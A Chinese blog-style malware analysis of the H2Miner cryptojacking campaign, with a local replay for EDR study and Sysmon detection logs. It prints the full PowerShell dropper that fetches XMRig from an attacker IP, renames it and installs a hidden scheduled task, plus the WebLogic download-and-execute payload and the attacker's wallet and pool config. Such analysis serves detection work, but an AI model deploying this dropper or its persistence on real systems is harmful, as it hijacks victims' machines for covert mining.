• 活跃的H2Miner组织挖矿分析,含样本本地复现【EDR 经典case】


    双平台传播——活跃的H2Miner组织挖矿分析

    https://www.antiy.cn/research/notice&report/research_report/20211117.html
     
    攻击者利用漏洞入侵Windows平台和Linux平台。在Windows平台中,失陷主机下载并执行wbw.xml的XML文件,在XML文件中执行一段PowerShell命令,下载名为1.ps1的脚本,该脚本下载挖矿程序以及挖矿的配置文件并重命名执行,创建计划任务每30分钟执行一次1.ps1脚本,实现持久化长期驻留失陷主机;在Linux平台中,失陷主机下载并执行名为wb.xml的XML文件,该XML文件使用同样的手法内嵌了一段bash脚本,执行后下载挖矿脚本,主要功能包括清除竞品挖矿程序和计划任务、MD5校验、卸载安全软件和下载Kinsing恶意软件并执行等。Kinsing恶意软件不仅具有挖矿功能,还会在失陷主机上开放后门以及masscan端口扫描等功能,连接C2服务器上传版本号、内核数量、内存信息、操作系统信息、是否获得 Root 权限和Uuid等信息,并会下载后续脚本进行横向移动等。

    图3-1 整体攻击流程


    原理:

    通过攻击者利用了WebLogic RCE漏洞(CVE-2020-14882),调用images目录来利用CVE-2020-14882,这使他们可以在服务器上执行任意命令。他们利用此漏洞下载并执行了一个xml文件,其中包括一个用于下载和执行脚本的PowerShell命令。该脚本执行多项操作,例如下载XMRig及其配置文件,并将XMRig重命名为sysupdate,为更新过程安排任务,并确认矿机正在运行。

    1、初始访问

    威胁人员利用CVE-2020-14882执行了一个名为wbw的xml文件

     

     关键payload:

    powershell.exe "Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('http://95.142.39.135/1.ps1'))"
    

    2、执行过程

    在1的请求包中,威胁人员执行了wbw.xml文件,该文件会下载并执行1.ps1文件(https://s.threatbook.cn/report/file/58bb90f11070a114442c4fa1cbbccefadcdf954510ae2b8d91c9b22b1a8a42d5,微步里的下载位置)。脚本完整内容,注意,目前95.142.39.135这个IP已经不再生效了,要复现攻击的话,需要自己更换下IP:

    $ne = $MyInvocation.MyCommand.Path
    $miner_url = "http://95.142.39.135/xmrig.exe"
    $miner_url_backup = "http://95.142.39.135/xmrig.exe"
    $miner_size = 4578304
    $miner_name = "sysupdate"
    $miner_cfg_url = "http://95.142.39.135/config.json"
    $miner_cfg_url_backup = "http://95.142.39.135/config.json"
    $miner_cfg_size = 3714
    $miner_cfg_name = "config.json"
    
    
    $miner_path = "$env:TMP\sysupdate.exe"
    $miner_cfg_path = "$env:TMP\config.json"
    $payload_path = "$env:TMP\update.ps1"
    
    function Update($url,$backup_url,$path,$proc_name)
     {
        Get-Process -Name $proc_name | Stop-Process
        Remove-Item $path
        Try {
            $vc = New-Object System.Net.WebClient
            $vc.DownloadFile($url,$path)
        }
        Catch {
            Write-Output "donwload with backurl"
            $vc = New-Object System.Net.WebClient
            $vc.DownloadFile($backup_url,$path)
        }
    }
    
    #miner_path
    if((Test-Path $miner_path))
    {
        Write-Output "miner file exist"
        if((Get-Item $miner_path).length -ne $miner_size)
        {
            Update $miner_url $miner_url_backup $miner_path $miner_name
        }
    }
    else {
        Update $miner_url $miner_url_backup $miner_path $miner_name
    }
    #miner_cfg_path
    if((Test-Path $miner_cfg_path))
    {
        Write-Output "miner_cfg file exist"
        if((Get-Item $miner_cfg_path).length -ne $miner_cfg_size)
        {
            Update $miner_cfg_url $miner_cfg_url_backup $miner_cfg_path $miner_cfg_name
        }
    }
    else {
        Update $miner_cfg_url $miner_cfg_url_backup $miner_cfg_path $miner_cfg_name
    }
    
    Remove-Item $payload_path
    Remove-Item $HOME\update.ps1
    Try {
        $vc = New-Object System.Net.WebClient
        $vc.DownloadFile($payload_url,$payload_path)
    }
    Catch {
        Write-Output "download with backurl"
        $vc = New-Object System.Net.WebClient
        $vc.DownloadFile($payload_url_backup,$payload_path)
    }
    echo F | xcopy /y $payload_path $HOME\update.ps1
    
    SchTasks.exe /Create /SC MINUTE /TN "Update service for Windows Service" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -File $HOME\update.ps1" /MO 30 /F
    if(!(Get-Process $miner_name -ErrorAction SilentlyContinue))
    {
        Write-Output "Miner Not running"
    	Start-Process $miner_path -windowstyle hidden
    }
    else
    {
    	Write-Output "Miner Running"
    }
    
    Start-Sleep 5
    

     

    该脚本通过初始化miner_url等参数来确定xmrig文件及其配置文件config.json的下载位置,

    The script starts off by setting parameters, such as the download locations for XMRig and its config.

     

    config.json文件完整内容,该文件也可以从微步里下载,https://s.threatbook.cn/report/file/6be51ca6e829c4033d74feff743bcc0d3dc26cb13f687fe6c0d2f6169a8197b2:

    {
      "api": {
        "id": null,
        "worker-id": null
      },
      "http": {
        "enabled": false,
        "host": "127.0.0.1",
        "port": 0,
        "access-token": null,
        "restricted": true
      },
      "autosave": true,
      "background": true,
      "colors": true,
      "title": true,
      "randomx": {
        "init": -1,
        "mode": "auto",
        "1gb-pages": false,
        "rdmsr": true,
        "wrmsr": true,
        "cache_qos": false,
        "numa": true,
        "scratchpad_prefetch_mode": 1
      },
      "cpu": {
        "enabled": true,
        "huge-pages": true,
        "huge-pages-jit": false,
        "hw-aes": null,
        "priority": null,
        "memory-pool": false,
        "yield": true,
        "max-threads-hint": 100,
        "asm": true,
        "argon2-impl": null,
        "astrobwt-max-size": 550,
        "cn/0": false,
        "cn-lite/0": false,
        "kawpow": false
      },
      "opencl": {
        "enabled": false,
        "cache": true,
        "loader": null,
        "platform": "AMD",
        "adl": true,
        "cn/0": false,
        "cn-lite/0": false
      },
      "cuda": {
        "enabled": false,
        "loader": null,
        "nvml": true,
        "cn/0": false,
        "cn-lite/0": false
      },
      "donate-level": 1,
      "donate-over-proxy": 1,
      "log-file": null,
      "pools": [
        {
          "algo": null,
          "coin": null,
          "url": "45.136.244.146:3333",
          "user": "4ASk4RhUyLL7sxE9cPyBiXb82ofekJg2SKiv4MKtCbzwHHLQxVVfVr4D4xhQHyyMTieSM5VUFGR9jZVR5gp6sa1Q2p8SahC",
          "pass": "x",
          "rig-id": null,
          "nicehash": false,
          "keepalive": false,
          "enabled": true,
          "tls": false,
          "tls-fingerprint": null,
          "daemon": false,
          "socks5": null,
          "self-select": null
        },
        {
          "algo": null,
          "coin": null,
          "url": "37.59.44.193:3333",
          "user": "4ASk4RhUyLL7sxE9cPyBiXb82ofekJg2SKiv4MKtCbzwHHLQxVVfVr4D4xhQHyyMTieSM5VUFGR9jZVR5gp6sa1Q2p8SahC",
          "pass": "x",
          "rig-id": null,
          "nicehash": false,
          "keepalive": false,
          "enabled": true,
          "tls": false,
          "tls-fingerprint": null,
          "daemon": false,
          "socks5": null,
          "self-select": null
        },
        {
          "algo": null,
          "coin": null,
          "url": "94.23.23.52:3333",
          "user": "4ASk4RhUyLL7sxE9cPyBiXb82ofekJg2SKiv4MKtCbzwHHLQxVVfVr4D4xhQHyyMTieSM5VUFGR9jZVR5gp6sa1Q2p8SahC",
          "pass": "x",
          "rig-id": null,
          "nicehash": false,
          "keepalive": false,
          "enabled": true,
          "tls": false,
          "tls-fingerprint": null,
          "daemon": false,
          "socks5": null,
          "self-select": null
        },
        {
          "algo": null,
          "coin": null,
          "url": "pool.minexmr.com:3333",
          "user": "4ASk4RhUyLL7sxE9cPyBiXb82ofekJg2SKiv4MKtCbzwHHLQxVVfVr4D4xhQHyyMTieSM5VUFGR9jZVR5gp6sa1Q2p8SahC",
          "pass": "x",
          "rig-id": null,
          "nicehash": false,
          "keepalive": false,
          "enabled": true,
          "tls": false,
          "tls-fingerprint": null,
          "daemon": false,
          "socks5": null,
          "self-select": null
        },
        {
          "algo": null,
          "coin": null,
          "url": "pool.supportxmr.com:3333",
          "user": "4ASk4RhUyLL7sxE9cPyBiXb82ofekJg2SKiv4MKtCbzwHHLQxVVfVr4D4xhQHyyMTieSM5VUFGR9jZVR5gp6sa1Q2p8SahC",
          "pass": "x",
          "rig-id": null,
          "nicehash": false,
          "keepalive": false,
          "enabled": true,
          "tls": false,
          "tls-fingerprint": null,
          "daemon": false,
          "socks5": null,
          "self-select": null
        }
      ],
      "print-time": 60,
      "health-print-time": 60,
      "retries": 5,
      "retry-pause": 5,
      "syslog": false,
      "tls": {
        "enabled": false,
        "protocols": null,
        "cert": null,
        "cert_key": null,
        "ciphers": null,
        "ciphersuites": null,
        "dhparam": null
      },
      "user-agent": null,
      "verbose": 0,
      "watch": true,
      "pause-on-battery": false
    }
    

    The script then downloads and executes XMRig, renames it to sysupdate and then sets a schedule task, which runs update.ps1. There was no script located in this directory but we assume one would show up when the miner needed to be updated, if the threat actor still had access.

    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN "Update service for Windows Service" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -File C:\Users\Administrator\update.ps1" /MO 30 /F

    Defense Evasion

    The script renamed xmrig.exe to sysupdate in attempt to hide itself.

    Impact

    The server’s CPU was maxed out at 100% and likely would have caused issues in an enterprise environment. At the time of this writing the wallet used for mining barely had anything in it and appears to be dedicated to us.

     
    该组织在Windows平台上传播挖门罗币的程序,该程序使用开源挖矿程序xmrig.exe进行挖矿,版本号为6.4.0,目前配置文件中的钱包地址已被各大矿池封禁。
    xmrig的下载地址,https://s.threatbook.cn/report/file/5e5b5171a95955ecb0fa8f9f1ba66f313165044cc1978a447673c0ac17859170
    我用后面的挖矿命令行,本地运行了下,的确是可以运行的。
     
     
    开源xmrig挖矿下载地址: https://github.com/xmrig/xmrig/releases
     
    用下面的命令可以看到挖矿(用的example例子):
    xmrig.exe -o pool.hashvault.pro:3333 -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD -p x
    

     可以看到CPU占用情况:

     CPU占用60%。用的是6个线程在挖。

    一开始挖矿的时候,磁盘占用会非常高!

     控制台打印结果:

    D:\下载\xmrig-6.18.0-msvc-win64\xmrig-6.18.0>xmrig.exe -o pool.hashvault.pro:3333 -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD -p x
     * ABOUT        XMRig/6.18.0 MSVC/2019
     * LIBS         libuv/1.44.1 OpenSSL/1.1.1o hwloc/2.7.1
     * HUGE PAGES   permission granted
     * 1GB PAGES    unavailable
     * CPU          11th Gen Intel(R) Core(TM) i5-11400 @ 2.60GHz (1) 64-bit AES
                    L2:3.0 MB L3:12.0 MB 6C/12T NUMA:1
     * MEMORY       10.9/15.7 GB (69%)
                    Controller0-ChannelA-DIMM0: 16 GB DDR4 @ 2933 MHz M378A2G43AB3-CWE
                    Controller0-ChannelB-DIMM0: <empty>
     * MOTHERBOARD  LENOVO - 3730
     * DONATE       1%
     * ASSEMBLY     auto:intel
     * POOL #1      pool.hashvault.pro:3333 algo auto
     * COMMANDS     hashrate, pause, resume, results, connection
     * OPENCL       disabled
     * CUDA         disabled
    [2022-07-03 20:06:53.731]  net      use pool pool.hashvault.pro:3333  125.253.92.50
    [2022-07-03 20:06:53.732]  net      new job from pool.hashvault.pro:3333 diff 72000 algo rx/0 height 2659226 (11 tx)
    [2022-07-03 20:06:53.732]  cpu      use argon2 implementation AVX-512F
    [2022-07-03 20:06:53.733]  msr      to access MSR registers Administrator privileges required.
    [2022-07-03 20:06:53.733]  msr      FAILED TO APPLY MSR MOD, HASHRATE WILL BE LOW
    [2022-07-03 20:06:53.733]  randomx  init dataset algo rx/0 (12 threads) seed 9cfa17830fb15f71...
    [2022-07-03 20:06:53.737]  randomx  allocated 2336 MB (2080+256) huge pages 0% 0/1168 +JIT (4 ms)
    [2022-07-03 20:06:58.179]  randomx  dataset ready (4442 ms)
    [2022-07-03 20:06:58.179]  cpu      use profile  rx  (6 threads) scratchpad 2048 KB
    [2022-07-03 20:06:58.201]  cpu      READY threads 6/6 (6) huge pages 0% 0/6 memory 12288 KB (22 ms)
    [2022-07-03 20:07:00.252]  net      new job from pool.hashvault.pro:3333 diff 116758 algo rx/0 height 2659226 (11 tx)
    [2022-07-03 20:07:20.646]  cpu      accepted (1/0) diff 116758 (245 ms)
    [2022-07-03 20:07:25.083]  net      new job from pool.hashvault.pro:3333 diff 116758 algo rx/0 height 2659227 (24 tx)
    [2022-07-03 20:07:58.245]  miner    speed 10s/60s/15m 983.1 n/a n/a H/s max 1046.2 H/s
    [2022-07-03 20:08:00.250]  net      new job from pool.hashvault.pro:3333 diff 52290 algo rx/0 height 2659227 (24 tx)
    [2022-07-03 20:08:02.102]  cpu      accepted (2/0) diff 52290 (261 ms)
    [2022-07-03 20:08:44.705]  net      new job from pool.hashvault.pro:3333 diff 52290 algo rx/0 height 2659228 (21 tx)
    [2022-07-03 20:08:50.266]  net      new job from pool.hashvault.pro:3333 diff 52290 algo rx/0 height 2659229 (4 tx)
    [2022-07-03 20:08:58.300]  miner    speed 10s/60s/15m 1043.0 1039.9 n/a H/s max 1063.6 H/s
    [2022-07-03 20:09:00.260]  net      new job from pool.hashvault.pro:3333 diff 40260 algo rx/0 height 2659229 (4 tx)
    [2022-07-03 20:09:53.588]  cpu      accepted (3/0) diff 40260 (246 ms)
    [2022-07-03 20:09:58.370]  miner    speed 10s/60s/15m 907.4 936.8 n/a H/s max 1063.6 H/s
    [2022-07-03 20:10:00.234]  net      new job from pool.hashvault.pro:3333 diff 33570 algo rx/0 height 2659229 (4 tx)
    [2022-07-03 20:10:51.734]  net      new job from pool.hashvault.pro:3333 diff 33570 algo rx/0 height 2659229 (50 tx)
    [2022-07-03 20:10:58.442]  miner    speed 10s/60s/15m 936.3 909.4 n/a H/s max 1063.6 H/s
    [2022-07-03 20:11:00.237]  net      new job from pool.hashvault.pro:3333 diff 25410 algo rx/0 height 2659229 (50 tx)
    [2022-07-03 20:11:07.161]  cpu      accepted (4/0) diff 25410 (272 ms)
    [2022-07-03 20:11:10.551]  cpu      accepted (5/0) diff 25410 (266 ms)
    [2022-07-03 20:11:39.597]  cpu      accepted (6/0) diff 25410 (288 ms)
    [2022-07-03 20:11:58.503]  miner    speed 10s/60s/15m 943.3 977.0 n/a H/s max 1063.6 H/s
    [2022-07-03 20:12:00.252]  net      new job from pool.hashvault.pro:3333 diff 27900 algo rx/0 height 2659229 (50 tx)
    [2022-07-03 20:12:03.991]  cpu      accepted (7/0) diff 27900 (271 ms)
    [2022-07-03 20:12:11.433]  net      new job from pool.hashvault.pro:3333 diff 27900 algo rx/0 height 2659230 (11 tx)
    [2022-07-03 20:12:45.558]  cpu      accepted (8/0) diff 27900 (261 ms)
    [2022-07-03 20:12:55.501]  net      new job from pool.hashvault.pro:3333 diff 27900 algo rx/0 height 2659231 (23 tx)
    [2022-07-03 20:12:58.564]  miner    speed 10s/60s/15m 956.2 959.2 n/a H/s max 1063.6 H/s
    [2022-07-03 20:12:59.875]  net      new job from pool.hashvault.pro:3333 diff 27900 algo rx/0 height 2659232 (1 tx)
    [2022-07-03 20:13:07.999]  cpu      accepted (9/0) diff 27900 (262 ms)
    [2022-07-03 20:13:19.714]  cpu      accepted (10/0) diff 27900 (260 ms)
    [2022-07-03 20:13:58.633]  miner    speed 10s/60s/15m 823.7 860.9 n/a H/s max 1063.6 H/s
    [2022-07-03 20:14:56.582]  net      new job from pool.hashvault.pro:3333 diff 27960 algo rx/0 height 2659233 (40 tx)
    [2022-07-03 20:14:58.687]  miner    speed 10s/60s/15m 990.3 943.5 n/a H/s max 1063.6 H/s
    [2022-07-03 20:15:00.226]  net      new job from pool.hashvault.pro:3333 diff 24510 algo rx/0 height 2659233 (40 tx)
    [2022-07-03 20:15:51.945]  cpu      accepted (11/0) diff 24510 (274 ms)
    [2022-07-03 20:15:58.744]  miner    speed 10s/60s/15m 1009.9 960.9 n/a H/s max 1063.6 H/s
    [2022-07-03 20:16:00.231]  net      new job from pool.hashvault.pro:3333 diff 23130 algo rx/0 height 2659233 (40 tx)
    [2022-07-03 20:16:04.137]  cpu      accepted (12/0) diff 23130 (254 ms)
    [2022-07-03 20:16:18.237]  cpu      accepted (13/0) diff 23130 (262 ms)
    [2022-07-03 20:16:31.066]  signal   Ctrl+C received, exiting
    [2022-07-03 20:16:31.072]  cpu      stopped (5 ms)
    
    攻击事件样本整理

            根据攻击事件对样本进行梳理得到如下信息:

    表3-1 攻击事件样本整理

    样本下载地址

    详细说明

    hxxp[:]//194.38.20.199/1.ps1

    Windows恶意PowerShell

    hxxp[:]//194.38.20.199/xmrig.exe

    Windows门罗币挖矿程序

    hxxp[:]//194.38.20.199/config.json

    Windows挖矿配置文件

    hxxp[:]//194.38.20.199/md.sh

    Linux恶意shell

    hxxp[:]//194.38.20.199/kinsing

    Linux挖矿程序

    hxxp[:]//194.38.20.199/spre.sh

    横向移动脚本

    hxxp[:]//194.38.20.199/wb.xml

    Weblogic RCE payload(Linux)

    hxxp[:]//194.38.20.199/wbw.xml

    Weblogic RCE payload (Windows)

    表3-2 Windows挖矿配置文件中的矿池和钱包地址

    矿池地址

    钱包地址

    45.136.244.146:3333

    4ASk4RhUyLL7sxE9cPyBiXb82ofekJg2SKiv4MKtCbzwHHLQx

    VVfVr4D4xhQHyyMTieSM5VUFGR9jZVR5gp6sa1Q2p8SahC

    37.59.44.193:3333

    94.23.23.52:3333

    pool.minexmr.com:3333

    pool.supportxmr.com:3333

    微步和华为情报均可查询:

    File

    xmrig.exe
    57f0fdec4d919db0bd4576dc84aec752
    82e6af04eadb5fac25fbb89dc6f020da0f4b6dca
    5e5b5171a95955ecb0fa8f9f1ba66f313165044cc1978a447673c0ac17859170
    1.ps1
    70000d52dc3ad153464dc41891c10439
    9bd2bc3f87d4c9d029a4e6391358f776e86ad2d5
    58bb90f11070a114442c4fa1cbbccefadcdf954510ae2b8d91c9b22b1a8a42d5
    wbw.xml
    fe0f332ed847a25a18cd63dfdaf69908
    67ff54a71dfc5b817fbc6e62c6c30e9a30219fb9
    c8fd12490f9251080803a68e26a1bdb1919811334ec54ab194645bd516adf1c1
    config.json
    2d9a06afe4263530b900aa1c96a84665
    0c86e66105645700b08d33e793362de41d0b1878
    6be51ca6e829c4033d74feff743bcc0d3dc26cb13f687fe6c0d2f6169a8197b2

    好了,有了所有的样本,接下来我们本地复现下该挖矿的攻击了。

    Create a HTTP server with one command thanks to Python
    1. Open a terminal window.
    2. Navigate to the directory you want to have the root directory.
    3. Execute the command to start the server.
    4. Python 2 — python -m SimpleHTTPServer 8000.
    5. Python 3 — python -m http.server 8000.

    使用python运行:

     python -m http.server 80
    

     浏览器打开http://localhost,可以看到:

    先修改下config.json里的内容,IP换一下成127.0.0.1:

    $ne = $MyInvocation.MyCommand.Path
    $miner_url = "http://127.0.0.1/xmrig.exe"
    $miner_url_backup = "http://127.0.0.1/xmrig.exe"
    $miner_size = 4578304
    $miner_name = "sysupdate"
    $miner_cfg_url = "http://127.0.0.1/config.json"
    $miner_cfg_url_backup = "http://127.0.0.1/config.json"
    $miner_cfg_size = 3714
    $miner_cfg_name = "config.json"
    

     然后命令行执行:

     powershell.exe "Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('http://127.0.0.1/1.ps1'))"

    然后就看到在挖矿了:

    我们看下sysmon数据采集:

    Network connection detected:
    RuleName: Usermode
    UtcTime: 2022-07-03 13:33:31.628
    ProcessGuid: {0bf95bee-9aab-62c1-4401-000000001000}
    ProcessId: 8128
    Image: C:\Users\bonel\AppData\Local\Temp\sysupdate.exe
    User: DESKTOP-92JS9SJ\bonel
    Protocol: tcp
    Initiated: true
    SourceIsIpv6: false
    SourceIp: 10.0.2.15
    SourceHostname: -
    SourcePort: 50000
    SourcePortName: -
    DestinationIsIpv6: false
    DestinationIp: 45.136.244.146
    DestinationHostname: -
    DestinationPort: 3333
    

    看来矿池用的是:45.136.244.146

    Process Create:
    RuleName: -
    UtcTime: 2022-07-03 13:33:31.441
    ProcessGuid: {0bf95bee-9aab-62c1-4401-000000001000}
    ProcessId: 8128
    Image: C:\Users\bonel\AppData\Local\Temp\sysupdate.exe
    FileVersion: 6.4.0
    Description: XMRig miner
    Product: XMRig
    Company: www.xmrig.com
    OriginalFileName: xmrig.exe
    CommandLine: "C:\Users\bonel\AppData\Local\Temp\sysupdate.exe" 
    CurrentDirectory: C:\Users\bonel\h2miner\
    User: DESKTOP-92JS9SJ\bonel
    LogonGuid: {0bf95bee-9875-62c1-2493-0a0000000000}
    LogonId: 0xA9324
    TerminalSessionId: 1
    IntegrityLevel: Medium
    Hashes: MD5=57F0FDEC4D919DB0BD4576DC84AEC752,SHA256=5E5B5171A95955ECB0FA8F9F1BA66F313165044CC1978A447673C0AC17859170,IMPHASH=85614AD7B23A2780453C1947D2A3D660
    ParentProcessGuid: {0bf95bee-9aaa-62c1-4101-000000001000}
    ParentProcessId: 7972
    ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    ParentCommandLine: powershell.exe  "Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('http://127.0.0.1/1.ps1'))"
    ParentUser: DESKTOP-92JS9SJ\bonel
    

     可以看到是powershell里启动的sysupdate.exe

    Process Create:
    RuleName: -
    UtcTime: 2022-07-03 13:33:31.361
    ProcessGuid: {0bf95bee-9aab-62c1-4301-000000001000}
    ProcessId: 8100
    Image: C:\Windows\System32\schtasks.exe
    FileVersion: 10.0.19041.1503 (WinBuild.160101.0800)
    Description: Task Scheduler Configuration Tool
    Product: Microsoft® Windows® Operating System
    Company: Microsoft Corporation
    OriginalFileName: schtasks.exe
    CommandLine: "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /TN "Update service for Windows Service" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -File C:\Users\bonel\update.ps1" /MO 30 /F
    CurrentDirectory: C:\Users\bonel\h2miner\
    User: DESKTOP-92JS9SJ\bonel
    LogonGuid: {0bf95bee-9875-62c1-2493-0a0000000000}
    LogonId: 0xA9324
    TerminalSessionId: 1
    IntegrityLevel: Medium
    Hashes: MD5=76CD6626DD8834BD4A42E6A565104DC2,SHA256=013C013E0EFD13C9380FAD58418B7ACA8356E591A5CCEFFDB910F7D8B0AD28EF,IMPHASH=ECCE05491F2E8F279F4790BCB1318C05
    ParentProcessGuid: {0bf95bee-9aaa-62c1-4101-000000001000}
    ParentProcessId: 7972
    ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    ParentCommandLine: powershell.exe  "Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('http://127.0.0.1/1.ps1'))"
    ParentUser: DESKTOP-92JS9SJ\bonel
    

     另外还复制了一个临时文件:

    Process Create:
    RuleName: -
    UtcTime: 2022-07-03 13:33:31.348
    ProcessGuid: {0bf95bee-9aab-62c1-4201-000000001000}
    ProcessId: 8076
    Image: C:\Windows\System32\xcopy.exe
    FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
    Description: Extended Copy Utility
    Product: Microsoft® Windows® Operating System
    Company: Microsoft Corporation
    OriginalFileName: XCOPY.EXE
    CommandLine: "C:\Windows\system32\xcopy.exe" /y C:\Users\bonel\AppData\Local\Temp\update.ps1 C:\Users\bonel\update.ps1
    CurrentDirectory: C:\Users\bonel\h2miner\
    User: DESKTOP-92JS9SJ\bonel
    LogonGuid: {0bf95bee-9875-62c1-2493-0a0000000000}
    LogonId: 0xA9324
    TerminalSessionId: 1
    IntegrityLevel: Medium
    Hashes: MD5=39FBFD3AF58238C6F9D4D408C9251FF5,SHA256=269EB0728413654856F4B2EE1FA7838CD69672EBC11BAED4CAA63F58C2DF5823,IMPHASH=1EFFE65A4F251E4AE9FA8551F9FCDABB
    ParentProcessGuid: {0bf95bee-9aaa-62c1-4101-000000001000}
    ParentProcessId: 7972
    ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    ParentCommandLine: powershell.exe  "Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('http://127.0.0.1/1.ps1'))"
    ParentUser: DESKTOP-92JS9SJ\bonel
    

     

     
  • 相关阅读:
    Vue 环境配置
    Vue-think脚手架
    搭建vue环境网站
    数组 还是 字符串
    javascript jquery console调试方法说明
    获取 stoken 或者id MVC写法
    它山之石
    Android学习笔记_44_apk安装、反编译及防治反编译
    (转)超级实用且不花哨的js代码大全
    Android学习笔记_43_网络通信之文件断点上传
  • 原文地址:https://www.cnblogs.com/bonelee/p/16378059.html
Copyright © 2020-2023  润新知